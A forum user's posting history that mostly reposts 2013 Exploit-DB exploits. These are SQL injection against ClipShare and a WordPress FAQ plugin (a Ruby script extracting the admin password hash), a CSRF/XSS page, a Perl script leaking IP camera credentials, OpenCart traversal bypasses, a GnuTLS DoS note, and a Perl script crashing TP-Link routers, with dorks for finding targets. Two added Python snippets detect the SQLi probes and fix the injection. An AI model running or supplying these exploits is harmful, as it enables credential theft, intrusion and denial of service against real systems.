Gonzalez
Posts posted by Gonzalez


  1. # Exploit Title: ClipShare 4.1.1 - Multiple Vulnerabilities
    # Exploit Author: Esac
    # Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4
    # Official site: http://www.clip-share.com
    # Software License: Commercial.
    # All versions are vulnerable.
    # Last Checked: 27 March 2013

    # Note: to exploit this vulnerability the MAGIC_QUOTES_GPC directive must be turned off on the server side (php.ini).

    ==============================================================================================

    vuln file : gvideos.php , param : gid

    Poc :

    http://server/mavideo/gvideos.php?gid=1 [Blind]

    # To exploit this PoC, a group with some public videos must already have been added.

    Real exploitation :

    http://server/mavideo/gvideos.php?gid=1 AND 1=1

    ==> return normal page

    http://server/mavideo/gvideos.php?gid=1 AND 1=2
    ==> return page with some errors ( or with nothing - white page )


    -------------------------------------------------------------------------------------------------------------------------------------------------


    vuln file : channel_detail.php , param : chid

    Poc :

    http://server/mavideo/channel_detail.php?chid=4 [Blind]


    Real exploitation :

    http://server/mavideo/channel_detail.php?chid=4 AND 1=1
    ==> return normal page

    http://server/mavideo/channel_detail.php?chid=4 AND 1=2
    ==> return page with some errors ( or with nothing - white page )


    -------------------------------------------------------------------------------------------------------------------------------------------------

    vuln file : uprofile.php , param : UID

    Poc :

    http://server/mavideo/uprofile.php?UID=66 [Blind]


    Real exploitation :

    http://server/mavideo/uprofile.php?UID=66 AND 1=1
    ==> return normal page

    http://server/mavideo/uprofile.php?UID=66 AND 1=2
    ==> return page with some errors ( or with nothing - white page )


    -------------------------------------------------------------------------------------------------------------------------------------------------

    vuln file : ufavour.php , param : UID

    Poc :

    http://server/mavideo/ufavour.php?UID=66 [Blind]


    Real exploitation :

    http://server/mavideo/ufavour.php?UID=66 AND 1=1
    ==> return normal page

    http://server/mavideo/ufavour.php?UID=66 AND 1=2
    ==> return page with some errors ( or with nothing - white page )


    -------------------------------------------------------------------------------------------------------------------------------------------------
    vuln file : ufriends.php , param : UID

    Poc :

    http://server/mavideo/ufriends.php?UID=66 [Blind]


    Real exploitation :

    http://server/mavideo/ufriends.php?UID=66 AND 1=1
    ==> return normal page

    http://server/mavideo/ufriends.php?UID=66 AND 1=2
    ==> return page with some errors ( or with nothing - white page )


    -------------------------------------------------------------------------------------------------------------------------------------------------
    vuln file : uplaylist.php , param : UID

    Poc :

    http://server/mavideo/uplaylist.php?UID=66 [Blind]


    Real exploitation :

    http://server/mavideo/uplaylist.php?UID=66 AND 1=1
    ==> return normal page

    http://server/mavideo/uplaylist.php?UID=66 AND 1=2
    ==> return page with some errors ( or with nothing - white page )


    -------------------------------------------------------------------------------------------------------------------------------------------------
    vuln file : ugroups.php , param : UID

    Poc :

    http://server/mavideo/ugroups.php?UID=66 [Blind]


    Real exploitation :

    http://server/mavideo/ugroups.php?UID=66 AND 1=1
    ==> return normal page

    http://server/mavideo/ugroups.php?UID=66 AND 1=2
    ==> return page with some errors ( or with nothing - white page )


    -------------------------------------------------------------------------------------------------------------------------------------------------

    PwnEd.
    Tested version:
    Sunday , March 27, 2013 | Version: 4.1.4 | Username: admin | Logout
    Copyright © 2006-2008 ClipShare. All rights reserved.
    ~ Game Over ~
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Greetz : White Tarbouch Team & Cobra & Dami

    ==> Made In Morocco <==
    ./Esac

    Source: Exploit-DB
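The advisory above depends on one oracle: the page renders normally for `AND 1=1` and breaks (or comes back empty) for `AND 1=2`. That same true/false pair, and the response-size difference it produces, is visible to the defender in the web server's access log. The script below is an added example, not part of Esac's advisory or of ClipShare: it parses Apache combined-format log lines (the sample lines are constructed for the demo), percent-decodes each query-string value, flags numeric parameters that carry a boolean comparison, and reports a client that sent both a true and a false comparison against the same script and parameter, together with the size delta between the two responses.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines in Apache "combined" format (not taken from the advisory).
# 10.0.0.5 sends the true/false comparison pair on gid; 192.0.2.9 is ordinary traffic,
# including a search term containing the word "and" that must not be flagged.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Mar/2013:10:01:02 +0000] "GET /mavideo/gvideos.php?gid=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.5 - - [27/Mar/2013:10:01:05 +0000] "GET /mavideo/gvideos.php?gid=1%20AND%201%3D1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.5 - - [27/Mar/2013:10:01:07 +0000] "GET /mavideo/gvideos.php?gid=1%20AND%201%3D2 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
192.0.2.9 - - [27/Mar/2013:10:02:00 +0000] "GET /mavideo/uprofile.php?UID=66 HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
192.0.2.9 - - [27/Mar/2013:10:02:03 +0000] "GET /mavideo/search.php?q=rock+and+roll HTTP/1.1" 200 2200 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\d+|-)'
)

# A numeric value followed by a boolean comparison, e.g. "1 AND 1=1" or "1 AND 1=2".
PROBE_RE = re.compile(
    r"^\s*\d+\s+(?:and|or)\s+(?P<lhs>\d+)\s*=\s*(?P<rhs>\d+)\s*$", re.IGNORECASE
)


def find_probes(log_text):
    """Return one record per request whose query-string value looks like a boolean probe."""
    probes = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        # parse_qsl percent-decodes, so "1%20AND%201%3D1" becomes "1 AND 1=1".
        for name, value in parse_qsl(parts.query):
            pm = PROBE_RE.match(value)
            if pm is None:
                continue
            probes.append({
                "ip": m.group("ip"),
                "path": parts.path,
                "param": name,
                "comparison_true": pm.group("lhs") == pm.group("rhs"),
                "bytes": int(m.group("bytes")) if m.group("bytes") != "-" else 0,
            })
    return probes


def pair_probes(probes):
    """Report (ip, path, param) groups that received both a true and a false comparison.

    A lone tautology can be noise; the true/false pair with different response sizes is
    the signature of the technique in the advisory, because that size difference is the
    oracle the sender reads."""
    groups = defaultdict(lambda: {"true": [], "false": []})
    for p in probes:
        key = (p["ip"], p["path"], p["param"])
        groups[key]["true" if p["comparison_true"] else "false"].append(p["bytes"])
    findings = []
    for (ip, path, param), g in groups.items():
        if g["true"] and g["false"]:
            findings.append({
                "ip": ip, "path": path, "param": param,
                "true_bytes": g["true"][0], "false_bytes": g["false"][0],
                "size_delta": abs(g["true"][0] - g["false"][0]),
            })
    return findings


if __name__ == "__main__":
    for f in pair_probes(find_probes(SAMPLE_LOG)):
        print(f"[!] boolean-pair probe from {f['ip']} on {f['path']} param {f['param']} "
              f"(response size {f['true_bytes']} vs {f['false_bytes']})")
```

Run it on a real log by replacing `SAMPLE_LOG` with the file contents; the pairing step is what keeps the output useful, since a single `OR 1=1` from a scanner is common while a matched true/false pair on one parameter from one client is rare.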

  2. The guys are right, you're better off learning programming or something else you enjoy; the pay in programming is good. Better to leave hacking to someone else. At least that's what I would do if I were just starting out.

    -Gonzalez

  3. # Exploit Title: WordPress IndiaNIC FAQ 1.0 Plugin Blind SQL Injection
    # Google Dork: inurl:wp-content/plugins/faqs-manager
    # Date: 21.03.2013
    # Exploit Author: m3tamantra (http://m3tamantra.wordpress.com/blog)
    # Vendor Homepage: http://wordpress.org/extend/plugins/faqs-manager/
    # Software Link: http://downloads.wordpress.org/plugin/faqs-manager.zip
    # Version: 1.0
    # Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli)

    ##############
    # Description:
    ##############
    # The "order" and "orderby" parameters are vulnerable to SQL Injection
    # Example URL: http://127.0.0.1:9001/wordpress/wp-admin/admin.php?page=inic_faq&orderby=<sqli>
    # The PoC takes some time to finish (15min on my test system).
    # I could speed it up with multithreading but I'm too lazy right now


    #### Vulnerable code part (wp_list_table.php) ################################################################
    #
    # function prepare_items() {
    #     $this->_column_headers = array($this->_columns, $this->_hidden_columns, $this->_sortable_columns);
    #     $sort_order = isset($_GET['order']) ? $_GET['order'] : "ASC";
    #     $orderby_column = isset($_GET['orderby']) ? " ORDER BY {$_GET['orderby']} {$sort_order}" : false;
    #
    #     global $wpdb;
    #     if (is_array($this->_sql)) {
    #         if ($orderby_column == false) {
    #             $data = $this->_sql;
    #         } else {
    #             $data = $this->_sql;
    #             usort($data, array(&$this, 'usort_reorder'));
    #         }
    #     } else {
    #         $data = $wpdb->get_results("{$this->_sql}{$orderby_column}", ARRAY_A);
    #     }
    ##############################################################################################################



    #################################
    #### Blind SQL Injection PoC ####
    #################################
    require "net/http"
    require "uri"

    $target = "" # EDIT ME #
    $cookie = "" # EDIT ME # authenticated user session

    # Example:
    #$target = "http://127.0.0.1:9001/wordpress/"
    #$cookie = "wordpress_a6a5d84619ae3f833460b386c064b9e5=admin%7C1364040545%7C86475c1a4fe1fc1fa5f1ebb04db1bc8f; wp-settings-1=editor%3Dhtml; wp-settings-time-1=1363441353; comment_author_a6a5d84619ae3f833460b386c064b9e5=tony; comment_author_email_a6a5d84619ae3f833460b386c064b9e5=tony%40bauer.de; comment_author_url_a6a5d84619ae3f833460b386c064b9e5=http%3A%2F%2Fsucker.de; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_a6a5d84619ae3f833460b386c064b9e5=admin%7C1364040545%7Cd7053b96adaa95745023b91694bf30ef; PHPSESSID=1h7f2o5defu6oa8iti6mqnevc7; bp-activity-oldestpage=1"

    if $target.eql?("") or $cookie.eql?("")
      puts "\n[!]\tPlease set $target and $cookie variable\n"
      raise
    end

    # Alphabet of a phpass hash; the hash is "$P$" plus 31 more characters (34 in total)
    $chars = ["."] + ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a
    $hash = "$P$"
    $i = 0 # chars index
    $j = 4 # hash index


    def sqli_send()
      sqli = URI.escape("(CASE WHEN ((SELECT ASCII(SUBSTRING(user_pass, #{$j}, 1)) FROM wp_users WHERE id = 1) = #{$chars[$i].ord}) THEN 1 ELSE 1*(SELECT table_name FROM information_schema.tables)END) --")
      uri = URI.parse("#{$target}wp-admin/admin.php?page=inic_faq&orderby=#{sqli}")
      http = Net::HTTP.new(uri.host, uri.port)
      #http.set_debug_output($stderr)
      request = Net::HTTP::Get.new(uri.request_uri)
      request["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:19.0) Gecko/20100101 Firefox/19.0"
      request["Cookie"] = $cookie
      resp = http.request(request)
      if( resp.code != "200" )
        puts "something is wrong response = #{resp.code}"
        raise
      end
      # In WordPress default settings no SQL error will be displayed,
      # but when an error appears we don't get any result.
      # The PoC searches for "No record found" and assumes there was an error
      return resp.body().match(/No record found/)
    end

    def print_status()
      output = "HASH: #{$hash} try #{$chars[$i]}"
      print "\b"*output.length + output
    end

    while( $hash.length < 34 )
      if( !sqli_send() )
        $hash += $chars[$i]
        $j += 1
        $i = 0
      else
        $i += 1
      end
      print_status()
    end
    puts "\n[+]\thave a nice day \n"
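The vulnerable `prepare_items()` quoted in the post builds `ORDER BY {$_GET['orderby']} {$sort_order}` by string interpolation. Unlike WHERE values, sort columns and directions cannot be passed as bound query parameters, so the fix is an allowlist: the request value only selects one of the application's own constants and never reaches the SQL text. The snippet below is an added example in Python with sqlite3, not code from the plugin or from m3tamantra's post; the `faqs` table and its column names are constructed for the demo. It shows the interpolating form beside the allowlisted form and runs the safe one against an in-memory table.

```python
import sqlite3

# Constructed schema for the demo; the plugin's real table and columns are not shown in the post.
ALLOWED_ORDER_COLUMNS = {"id", "question", "created"}
ALLOWED_DIRECTIONS = {"ASC", "DESC"}


def vulnerable_order_clause(orderby, order="ASC"):
    """Same shape as the plugin's prepare_items(): request values land in the SQL text untouched."""
    return f" ORDER BY {orderby} {order}" if orderby is not None else ""


def safe_order_clause(orderby, order="ASC"):
    """Allowlisted replacement. Identifiers cannot be bound as parameters, so the only
    strings that ever reach the SQL text are the constants declared above."""
    if orderby is None:
        return ""
    if orderby not in ALLOWED_ORDER_COLUMNS:
        raise ValueError(f"unknown sort column: {orderby!r}")
    direction = order.upper() if isinstance(order, str) else "ASC"
    if direction not in ALLOWED_DIRECTIONS:
        raise ValueError(f"unknown sort direction: {order!r}")
    return f' ORDER BY "{orderby}" {direction}'


def accepts(orderby, order="ASC"):
    """True when the allowlist lets the pair through, False when it is rejected."""
    try:
        safe_order_clause(orderby, order)
        return True
    except ValueError:
        return False


def demo_connection():
    """In-memory table standing in for the plugin's FAQ list."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE faqs (id INTEGER PRIMARY KEY, question TEXT, created TEXT)")
    conn.executemany(
        "INSERT INTO faqs (question, created) VALUES (?, ?)",
        [
            ("Why is the sky blue?", "2013-03-01"),
            ("How do I reset my password?", "2013-03-10"),
            ("Where is the FAQ?", "2013-02-20"),
        ],
    )
    return conn


def list_questions(conn, orderby=None, order="ASC"):
    """The list-table query with the allowlisted ORDER BY appended."""
    sql = "SELECT question FROM faqs" + safe_order_clause(orderby, order)
    return [row[0] for row in conn.execute(sql)]


if __name__ == "__main__":
    conn = demo_connection()
    print(list_questions(conn, "created", "asc"))
    # A payload in the style of the post's PoC: the interpolating form embeds it verbatim,
    # the allowlisted form refuses it before any SQL is built.
    payload = "(CASE WHEN 1=1 THEN 1 ELSE 0 END) --"
    print(vulnerable_order_clause(payload))
    print("accepted by allowlist:", accepts(payload))
```

The allowlist is deliberately a set of column names rather than a character filter: a filter that strips quotes or semicolons would still let the post's `CASE WHEN ... END` payload through, since it needs neither.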

  4. <html>
    <!--
    # Exploit Title: WordPress IndiaNIC FAQ 1.0 Plugin CSRF + XSS
    # Google Dork: inurl:wp-content/plugins/faqs-manager
    # Date: 21.03.2013
    # Exploit Author: m3tamantra (http://m3tamantra.wordpress.com/blog)
    # Vendor Homepage: http://wordpress.org/extend/plugins/faqs-manager/
    # Software Link: http://downloads.wordpress.org/plugin/faqs-manager.zip
    # Version: 1.0
    # Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli)


    ##############
    # Description:
    ##############
    # The IndiaNIC FAQ Settings Page is vulnerable to CSRF.
    # The Ask Question area (front-end) is vulnerable to XSS. It is possible to insert <script>alert(1)</script> in the question parameter.
    # The Captcha value can be read from the captcha parameter (hidden field)
    #



    ###################################
    #### Part of Ask Question form ####
    ###################################
    <form action="" method="POST" name="iNICfaqsAskForm_1">
    <input type="hidden" value="1" name="group_id">
    <input type="hidden" value="1" name="from_user">
    <input type="hidden" value="inic_faq_questions" name="action">
    <input type="hidden" value="5540" name="captcha"> <=================== We don't need the captcha Image when we have this xD


    ####################################################################
    #### Request from Ask Question area (XSS in question parameter) ####
    ####################################################################
    POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
    Host: 127.0.0.1:9001
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:19.0) Gecko/20100101 Firefox/19.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Referer: http://127.0.0.1:9001/wordpress/?p=11
    Content-Length: 143
    Connection: keep-alive
    Pragma: no-cache
    Cache-Control: no-cache

    group_id=1&from_user=1&action=inic_faq_questions&captcha=8560&who_asked=lalalallala%40gmail.com&question=XSS+TEST+<script>alert(1)</script>%3F&captcha_code=8560

    # When an admin navigates to the Question area (back-end), arbitrary JavaScript will execute.



    #######################################################################
    -->
    <title>
    #####################################################
    ############## IndiaNIC FAQ 1.0 CSRF ################
    #####################################################
    </title>
    <body>

    <!-- replace "127.0.0.1:9001/wordpress" -->
    <form action="http://127.0.0.1:9001/wordpress/wp-admin/admin-ajax.php" method="POST">
    <input type="hidden" name="action" value="inic_faq_settings" />
    <input type="hidden" name="alert_email_address" value="m3tamantra@127.0.0.1" />
    <input type="hidden" name="capture_email" value="1" />
    <input type="hidden" name="notify_when_answered" value="1" />
    <input type="hidden" name="listing_template" value="lalalalalalalalalalalalal" />
    <input type="hidden" name="custom_css" value="babaaaaaammmmmmmm" />
    <input type="hidden" name="custom_js" value="alert(1234)" />
    </form>
    <script>document.forms[0].submit();</script>

    </body>
    </html>

  5. #!/usr/bin/perl
    #
    # [+] StarVedia IPCamera IC502w IC502w+ v020313 remote bypass username/password disclosure exploit
    # Author: Todor Donev
    # Email: todor.donev at gmail dot com
    # Type: Hardware
    #
    # Thanks to Tsvetelina Emirska the best friend in my life
    # and all my other friends for the help and support which
    # gives me. Kind regards to all of you, who read my lil'
    # exploits.
    # Bulgaria, Sofia
    # 03.2013
    #
    # Shodanhq r0x 4 teh lulz!!
    # http://www.youtube.com/watch?v=qNyN1AY-YZQ Cheeerzz
    #
    # Another bug, hint: you can edit this code and add some lines for remote change the password.
    #####

    use LWP::Simple;

    if (@ARGV == 0) { &usg; }
    while (@ARGV > 0) {
        $type = shift(@ARGV);
        $t    = shift(@ARGV);
    }
    if ($type eq "-d") {
        my $r = get("http://$t/cgi-bin/passwd.cgi?") or die(" $t: Not vulnerable, $!\n");
        print " [+] StarVedia IPCamera IC502w IC502w+ v020313 remote bypass username/password disclosure exploit\n";
        print " [!] Exploiting: $t\n";
        if ($r =~ m/<INPUT type=text name=user size=20 maxlength=19 value="(.*)">/g) {
            $result .= " [o] User: $1\n";
        } else { die(" Try another exploit, $!"); }
        if ($r =~ m/<INPUT type=password name=passwd size=20 maxlength=19 value="(.*)">/g) {
            $result .= " [o] Password: $1\n";
        } else { die("Try another exploit or restart the exploit\n"); }
        sleep(1);
        print " [\\m/] BINGO!!!\n\a" . $result;
    }
    sub usg() {
        print " [!] usg: perl $0 [-r or -d] <victim:port>\n";
        print " [!] -d: disclosure password option\n";
        print " [!] exp: perl $0 -d 127.0.0.1 \n";
        exit;
    }

  6. [waraxe-2013-SA#098] - Directory Traversal Vulnerabilities in OpenCart 1.5.5.1
    ===============================================================================

    Author: Janek Vind "waraxe"
    Date: 19. March 2013
    Location: Estonia, Tartu
    Web: http://www.waraxe.us/advisory-98.html


    Description of vulnerable software:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    OpenCart is a turn-key ready "out of the box" shopping cart solution.
    You simply install, select your template, add products and you're ready to start
    accepting orders.

    http://www.opencart.com/

    Affected are all OpenCart versions, from 1.4.7 to 1.5.5.1, maybe older too.

    ###############################################################################
    1. Directory Traversal Vulnerabilities in "filemanager.php"
    ###############################################################################

    Reason: insufficient sanitization of user-supplied data
    Attack vectors:
    1. user-supplied POST parameters "directory", "name", "path", "from", "to"
    Preconditions:
    1. Logged in as admin with filemanager access privileges

    Script "filemanager.php" offers OpenCart admins various file-related services:
    directory listing and creation, image file listing, file copy/move/unlink, upload,
    image resize. By design, an OpenCart admin can manage files and directories only
    inside the specific subdirectory "image/data/". It means that even if you have
    OpenCart admin privileges, you still are not supposed to get access to the files
    and directories below "image/data/". So far, so good.
    But what about directory traversal? Let's have a look at the source code.

    PHP script "admin/controller/common/filemanager.php" line 66:
    ------------------------[ source code start ]----------------------------------
    public function directory() {
        $json = array();

        if (isset($this->request->post['directory'])) {
            $directories = glob(rtrim(DIR_IMAGE . 'data/' .
                str_replace('../', '', $this->request->post['directory']), '/') .
                '/*', GLOB_ONLYDIR);

            if ($directories) {
                $i = 0;

                foreach ($directories as $directory) {
                    $json[$i]['data'] = basename($directory);
                    $json[$i]['attributes']['directory'] =
                        utf8_substr($directory, strlen(DIR_IMAGE . 'data/'));
        ...

        $this->response->setOutput(json_encode($json));
    ------------------------[ source code end ]------------------------------------

    We can see that directory traversal is prevented by removing "../" substrings
    from user-submitted parameters. At first look this seems to be secure enough -
    if we can't use "../", then directory traversal is impossible, right?
    Deeper analysis shows a couple of shortcomings in this specific filtering method.
    First problem - if OpenCart is hosted on a Windows platform, then it's possible
    to use the "..\" substring for directory traversal.

    Test (parameter "token" must be valid):
    -------------------------[ test code start ]-----------------------------------
    <html><body><center>
    <form action="http://localhost/oc1551/admin/index.php?route=common/filemanager/directory&token=92aa6ac32b4c8e7a175c3dc9f7754d25" method="post">
    <input type="hidden" name="directory" value="..\..\..\">
    <input type="submit" value="Test">
    </form>
    </center></body></html>
    --------------------------[ test code end ]------------------------------------

    Server response is in JSON format and contains listing of subdirectories outside
    of OpenCart main directory.

    Second problem - filtering with "str_replace" can be tricked by using custom
    strings. If we use the "..././" substring, then after filtering it becomes "../".
    So it appears that the implemented anti-traversal code is ineffective and can
    be bypassed.

    Test (parameter "token" must be valid):
    -------------------------[ test code start ]-----------------------------------
    <html><body><center>
    <form action="http://localhost/oc1551/admin/index.php?route=common/filemanager/directory&token=92aa6ac32b4c8e7a175c3dc9f7754d25" method="post">
    <input type="hidden" name="directory" value="..././..././..././..././">
    <input type="submit" value="Test">
    </form>
    </center></body></html>
    --------------------------[ test code end ]------------------------------------

    The server response is exactly the same as in the previous test - information about the
    directory structure outside of the OpenCart main directory has been disclosed.

    PHP script "filemanager.php" contains 14 uses of "str_replace('../', ''," code.
    Most of the public functions in "filemanager.php" are affected by directory
    traversal vulnerability:

    public function directory() -> listing of subdirectories
    public function files() -> listing of image files
    public function create() -> creation of new directories
    public function delete() -> deletion of arbitrary files and directories
    public function move() -> renaming of files or directories
    public function copy() -> copying of files or directories
    public function rename() -> renaming of files or directories
    public function upload() -> uploading of image or flash files



    Contact:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    come2waraxe@yahoo.com
    Janek Vind "waraxe"

    Waraxe forum: http://www.waraxe.us/forums.html
    Personal homepage: http://www.janekvind.com/
    Random project: http://albumnow.com/
    ---------------------------------- [ EOF ] ------------------------------------

  7. Sorry I forgot to write headers in previous mail.

    # Exploit Title: [possible ways to exploit CVE-2012-1663( GNUTLS-3.0.13)]
    # Google Dork: [if relevant] (we will automatically add these to the GHDB)
    # Date: [Mar 20, 2013]
    # Exploit Author: [Shawn the R0ck]
    # Vendor Homepage: [http://www.gnutls.org/]
    # Software Link: [download link if available]
    # Version: [<= 3.0.13]
    # Tested on: [GNU/Linux]
    # CVE : [CVE-2012-1663]

    PoC: http://www.exploit-db.com/sploits/24865.tar.bz2

    I'm glad to share this to you guys. The test code was attached. You
    also could find them here:
    https://github.com/citypw/arsenal-4-sec-testing/tree/master/libgnutls/CVE-2012-1663

    CVE-2013-1663[1] is a possible remote DOS attack issue. This issue has
    been fixed[2] in >=GNUTLS-3.0.14. I hacked on it for hours and figured out
    a few prerequisites that could make it vulnerable:

    =============================
    REQUIRED:

    - prior to GNUTLS 3.0.14
    - crafted certificate

    =============================
    Attacking SCENES

    - a client imports a crafted cert file for sending a req to a server( CA?)

    - a "server" imports a crafted cert file for sending a req to another
    server( CA?)

    ---> With high-frequency use of the above manipulations

    Standing on the client side, the attacker should try to construct a
    crafted certificate that makes the function below fail:

    ret = gnutls_pubkey_import_x509(pcert->pubkey, crt, 0);
    if (ret < 0)
    {
        gnutls_pubkey_deinit(pcert->pubkey);
        /* pcert->pubkey should be NULL now */
        ret = gnutls_assert_val(ret);
        goto cleanup;
    }

    I made up two crafted cert files( client.pem, client2.pem) which seem to
    trigger the double free issue on the client's side.

    Warning: Don't try it on your host machine because it would cost too
    much memory and make your machine very slow.

    shawn@sl13:~/gnutls_compile_uses/CVE-2012-1663$ ./ex-serv-x509
    processing server set to null?
    Server ready. Listening to port '5556'.

    shawn@sl13:~/gnutls_compile_uses/CVE-2012-1663$ ./attack.sh
    ................
    .................
    ...................

    Another terminal: killall client

    Test platform: Slackware 13.37 + GNUTLS-3.0.13

    [1] http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1663

    [2] Upstream fix
    http://git.savannah.gnu.org/gitweb/?p=gnutls.git;a=commitdiff;h=9c62f4feb2bdd6fbbb06eb0c60bfdea80d21bbb8


    --
    GNU powered it...
    GPL protect it...
    God blessing it...

    regards
    Shawn

  8. #!/usr/local/bin/perl
    #
    #
    # TP-Link TL-WR740N Wireless Router Remote Denial Of Service Exploit
    #
    #
    # Vendor: TP-LINK Technologies Co., Ltd.
    # Product web page: http://www.tp-link.us
    #
    # Affected version:
    #
    # - Firmware version: 3.16.4 Build 130205 Rel.63875n (Released: 2/5/2013)
    # - Hardware version: WR740N v4 00000000 (v4.23)
    # - Model No. TL-WR740N / TL-WR740ND
    #
    # Summary: The TL-WR740N is a combined wired/wireless network connection
    # device integrated with internet-sharing router and 4-port switch. The
    # wireless N Router is 802.11b&g compatible based on 802.11n technology
    # and gives you 802.11n performance up to 150Mbps at an even more affordable
    # price. Bordering on 11n and surpassing 11g speed enables high bandwidth
    # consuming applications like video streaming to be more fluid.
    #
    # Desc: The TP-Link WR740N Wireless N Router network device is exposed to a
    # remote denial of service vulnerability when processing a HTTP request. This
    # issue occurs when the web server (httpd) fails to handle a HTTP GET request
    # over a given default TCP port 80. Sending a sequence of three dots (...) to
    # the router will crash its httpd service denying the legitimate users access
    # to the admin control panel management interface. To bring back the http srv
    # and the admin UI, a user must physically reboot the router.
    #
    #
    # ============================== Playground: ==============================
    #
    # Shodan: WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N"
    #
    # # nmap -sV 192.168.0.1
    #
    # Starting Nmap 6.01 ( http://nmap.org ) at 2013-03-19 04:53 Central European Standard Time
    # Nmap scan report for 192.168.0.1
    # Host is up (0.00s latency).
    # Not shown: 999 closed ports
    # PORT STATE SERVICE VERSION
    # 80/tcp open http TP-LINK WR740N WAP http config
    # MAC Address: AA:BB:CC:DD:EE:FF (Tp-link Technologies CO.)
    # Service Info: Device: WAP
    #
    # Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
    # Nmap done: 1 IP address (1 host up) scanned in 12.42 seconds
    #
    # --------------------------------------------------------------------------
    # Changed Probe Directive in nmap-service-probes file [4 d range]:
    # - Line: 4682: Probe TCP GetRequest q|GET / HTTP/1.0\r\n\r\n|
    # + Line: 4682: Probe TCP GetRequest q|GET /... HTTP/1.0\r\n\r\n|
    # --------------------------------------------------------------------------
    #
    # # nping -c1 --tcp -p80 192.168.0.1 --data "474554202f2e2e2e20485454502f312e310d0a0d0a"
    #
    # Starting Nping 0.6.01 ( http://nmap.org/nping ) at 2013-03-19 04:55 Central European Standard Time
    # SENT (0.0920s) TCP 192.168.0.101:19835 > 192.168.0.1:80 S ttl=64 id=21796 iplen=61 seq=1961954057 win=1480
    # RCVD (0.1220s) TCP 192.168.0.1:80 > 192.168.0.101:19835 RA ttl=64 id=0 iplen=40 seq=0 win=0
    #
    # Max rtt: 0.000ms | Min rtt: 0.000ms | Avg rtt: 0.000ms
    # Raw packets sent: 1 (75B) | Rcvd: 1 (46B) | Lost: 0 (0.00%)
    # Tx time: 0.04000s | Tx bytes/s: 1875.00 | Tx pkts/s: 25.00
    # Rx time: 1.04000s | Rx bytes/s: 44.23 | Rx pkts/s: 0.96
    # Nping done: 1 IP address pinged in 1.12 seconds
    #
    # --------------------------------------------------------------------------
    #
    # # nmap -Pn 192.168.0.1 -p80
    #
    # Starting Nmap 6.01 ( http://nmap.org ) at 2013-03-19 04:57 Central European Standard Time
    # Nmap scan report for 192.168.0.1
    # Host is up (0.00s latency).
    # PORT STATE SERVICE
    # 80/tcp closed http
    # MAC Address: AA:BB:CC:DD:EE:FF (Tp-link Technologies CO.)
    #
    # Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds
    #
    # ============================= !Playground ===============================
    #
    #
    # Tested on: Router Webserver
    #
    #
    # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    #
    # Copyleft (c) 2013, Zero Science Lab
    # Macedonian Information Security Research And Development Laboratory
    # http://www.zeroscience.mk
    #
    #
    # Advisory ID: ZSL-2013-5135
    # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5135.php
    #
    #
    # 17.03.2013
    #

    use IO::Socket;

    $ip="$ARGV[0]"; $port="$ARGV[1]";

    print "\n\n\x20"."\x1f"x42 ."\n";
    print "\x20\x1f"."\x20"x40 ."\x1f\n";
    print "\x20\x1f TP-Link TL-WR740N httpd DoS Exploit \x1f\n";
    print "\x20\x1f"."\x20"x40 ."\x1f\n";
    print "\x20\x1f"."\x20"x7 ."\x16"x5 ."\x20"x15 ."\x16"x5 ."\x20"x8 ."\x1f\n";
    print "\x20\x1f"."\x20"x9 ."\x16"."\x20"x19 ."\x16"."\x20"x10 ."\x1f\n";
    print "\x20" ."\x1f"x42 ."\n";
    print "\x20\x4" ."\x20"x40 ."\x4\n";
    print "\x20" ."\x1e" x 42 ."\n";

    if ($#ARGV < 1) {
        print "\n\n\x20\x20\x1a\x20Usage: $0 <ip> <port>\n\n";
        exit();
    }

    $socket = IO::Socket::INET->new(
        Proto    => "tcp",
        PeerAddr => $ip,
        PeerPort => $port
    );

    $ta4ke="\x47\x45\x54\x20".
    "\x2f\x2e\x2e\x2e".
    "\x20\x48\x54\x54".
    "\x50\x2f\x31\x2e".
    "\x31\x0d\x0a\x0d".
    "\x0a";

    print "\n\x20\x1a\x20Sending evil payload...\n"; sleep 2;
    print $socket "$ta4ke"; sleep 5; close $socket;
    print "\x20\x1a\x20HTTPd successfully poked.\n"; sleep 2;
    print "\x20\x1a\x20Verifying with Nmap...\n"; sleep 2;
    system("nmap -Pn $ip -p $port");
